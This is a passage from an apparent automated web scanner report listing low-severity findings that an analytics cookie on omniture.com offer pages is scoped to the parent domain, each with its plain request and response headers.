Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:36 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/191 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:36 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:36 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:36 GMT
Content-Length: 13992
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:36 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Genesis: Introducing '
...[SNIP]...

11.449. http://www.omniture.com/offer/285 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/285

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:15 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/285 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:26:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:26:15 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:26:15 GMT
Content-Length: 13697
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:15 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Multichannel Measurement:Strate
...[SNIP]...

11.450. http://www.omniture.com/offer/286 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/286

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:12 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/286 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:12 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:12 GMT
Content-Length: 13629
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:12 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe.. Test&Target, powered by
...[SNIP]...

11.451. http://www.omniture.com/offer/291 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/291

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:26:08 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/291 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:26:08 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:26:08 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:26:09 GMT
Content-Length: 14357
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:26:08 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>30 SEO Strategies for Corporate
...[SNIP]...

11.452. http://www.omniture.com/offer/301 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/301

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:32:30 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/301 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:32:30 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:32:30 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:32:30 GMT
Content-Length: 13581
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:32:30 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Becoming a Data Driven Marketer
...[SNIP]...

11.453. http://www.omniture.com/offer/303 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/303

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/303 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:27:16 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:27:16 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:27:16 GMT
Content-Length: 14171
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:16 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Multichannel Retailing: Retaini
...[SNIP]...

11.454. http://www.omniture.com/offer/323 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/323

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/323 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:16 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:16 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:16 GMT
Content-Length: 13878
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:16 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Survey: Product Overvi
...[SNIP]...

11.455. http://www.omniture.com/offer/331 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/331

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:24:20 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/331 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:24:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:24:20 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:24:21 GMT
Content-Length: 15381
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:24:20 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Where is Interactive Marketing
...[SNIP]...

11.456. http://www.omniture.com/offer/335 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/335

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:12 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/335 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:27:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:27:12 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:27:12 GMT
Content-Length: 13682
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:12 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Insight: Convert Shopp
...[SNIP]...

11.457. http://www.omniture.com/offer/337 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/337

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:07 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/337 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:27:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:27:07 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:27:07 GMT
Content-Length: 13420
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:07 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Insight: Gain Rapid Bu
...[SNIP]...

11.458. http://www.omniture.com/offer/357 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/357

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:26:03 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/357 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:26:03 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:26:03 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:26:04 GMT
Content-Length: 15005
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:26:03 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Is 15% of Your Online Budget Al
...[SNIP]...

11.459. http://www.omniture.com/offer/372 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/372

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:44 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/372 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:25:44 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:25:44 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:25:44 GMT
Content-Length: 14022
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:44 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Sprint Measures Impact of Socia
...[SNIP]...

11.460. http://www.omniture.com/offer/400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/400

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:26:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/400 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:26:16 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:26:16 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:26:16 GMT
Content-Length: 15457
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:26:16 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
